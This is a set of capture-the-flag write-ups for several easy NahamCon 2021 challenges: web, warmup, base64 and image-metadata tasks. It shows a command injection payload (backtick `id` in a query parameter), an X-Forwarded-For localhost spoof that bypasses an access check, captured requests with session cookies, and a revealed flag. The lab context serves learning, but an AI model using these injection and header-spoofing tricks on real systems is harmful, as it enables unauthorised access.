nahamcon2021

category warmups - easy solution The challenge URL had a web based echo service. Many special characters, except for < and ` were filtered. It took me a while but I found the param had command injection. For example: GET /?echo=`id` HTTP/1.1 Host: challenge.nahamcon.com:30074 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://challenge.nahamcon.com:30074/?echo=food Cookie: auth2=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E; auth=eyJpZCI6MX0....

category web - easy solution The challenge URL returns the message Sorry, this page is not accessible externally. Add the X-Forwarded-For: 127.0.0.1 header to reveal the flag. GET / HTTP/1.1 Host: challenge.nahamcon.com:30903 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close X-Forwarded-For: 127.0.0.1 Cookie: auth2=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E; auth=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E Upgrade-Insecure-Requests: 1 The response has the flag. <p class="card-text"> <div class="alert alert-success" role="alert"> <b>Welcome!...

category warmups - easy solution The downloaded file contained a string, which looked like it was base64 encoded. The challenge title was also base64 reversed, esab64. ❯ cat esab64 mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X To solve, reverse the string, base64 decode and then reverse it again. import base64 with open("esab64", "r") as f: s = f.readline() s = s[::-1] d = base64.b64decode(s) print(d[::-1][:-1]) Running it gives us the flag. $ python3 solve.py b'flag{fb5211b498afe87b1bd0db601117e16e}'

category warmups - easy solution The downloaded file you get is an image, when opened looks like this: Output of exiftool shows that there is a thumbnail, with a hint to extract it right at the bottom. ❯ exiftool pollex.jpg ExifTool Version Number : 12.16 File Name : pollex.jpg Directory : . File Size : 37 KiB File Modification Date/Time : 2021:03:13 13:40:45+02:00 File Access Date/Time : 2021:03:15 09:53:11+02:00 File Inode Change Date/Time : 2021:03:15 09:53:11+02:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1....